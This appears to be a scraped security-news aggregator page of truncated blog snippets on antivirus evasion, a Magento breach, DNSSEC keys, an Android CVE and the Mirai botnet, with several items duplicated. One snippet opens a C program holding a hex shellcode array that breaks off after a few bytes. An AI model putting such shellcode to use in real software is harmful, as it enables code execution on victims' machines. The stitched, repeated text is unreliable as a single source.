Aggregator

以前刚开始学网络安全，是从免杀开始的。记得那时候杀毒软件还很弱。金山江民瑞星还存在。 那会什么原理也不懂，就一直瞎鼓捣。（后来转入渗透行列了） 这段时间一直在学PE格式，突然想起来以前很古老的PE文件头移位。 网上搜了搜，看大家虽然做了视频，但是竟然没人讲原理。借着刚好在学PE格式的知识，就做个PE

时至今日，博客程序也差不多完成了。欢迎提意见。

According to DARPA, it takes an average of 312 days for security pros to discover software vulnerabilities such as viruses, malware, and other attacks. In hacker time, that’s a virtual eternity in which bad actors can wreak havoc.

According to DARPA, it takes an average of 312 days for security pros to discover software vulnerabilities such as viruses, malware, and other attacks. In hacker time, that’s a virtual eternity in which bad actors can wreak havoc.

There’s a modern joy we’re all too familiar with. We’ve all made an online purchase while reclining in pajamas, computer...

The post Leading E-Commerce Platform Magento Cracked by Cybercriminals appeared first on McAfee Blog.

#include "stdafx.h" #include #include char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78...

A few weeks ago, on Oct. 1, 2016, Verisign successfully doubled the size of the cryptographic key that generates Domain Name System Security Extensions (DNSSEC) signatures for the internet’s DNS root zone. With this change, root zone Domain Name System (DNS) responses can be fully validated using 2048-bit RSA keys. This project involved work by […]

The post A Great Collaborative Effort: Increasing the Strength of the Zone Signing Key for the Root Zone appeared first on Verisign Blog.

培训是提高鉴定人专业素养、确保鉴定质量的必要手段。本期，将继续介绍中立机构SANS的系列培训认证以及产品X-ways的培训。

培训是提高鉴定人专业素养、确保鉴定质量的必要手段。本期，将继续介绍中立机构SANS的系列培训认证以及产品X-ways的培训。

培训是提高鉴定人专业素养、确保鉴定质量的必要手段。本期，将继续介绍中立机构SANS的系列培训认证以及产品X-ways的培训。

Today we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released. More information about this month’s security updates and advisories can be found in the Security TechNet Library. MSRC team

Today we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released. More information about this month’s security updates and advisories can be found in the Security TechNet Library. MSRC team

CVE-2015-3825是去年Android系统爆出的高危漏洞，与CVE-2014-7911一样都属于Android系统的反序列化漏洞。通过该漏洞可以实现Android系统提权及代码执行等一系列攻击行为，危害巨大

CVE-2015-3825是去年Android系统爆出的高危漏洞，与CVE-2014-7911一样都属于Android系统的反序列化漏洞。通过该漏洞可以实现Android系统提权及代码执行等一系列攻击行为，危害巨大

The latest evolution of cyber weapons is brought to you by the default passwords in Internet of Things (IoT) devices.

The latest evolution of cyber weapons is brought to you by the default passwords in Internet of Things (IoT) devices.

The Mirai botnet has infected hundreds of thousands of Internet of Things (IoT) devices, specifically security cameras, by using vendor default passwords for Telnet access.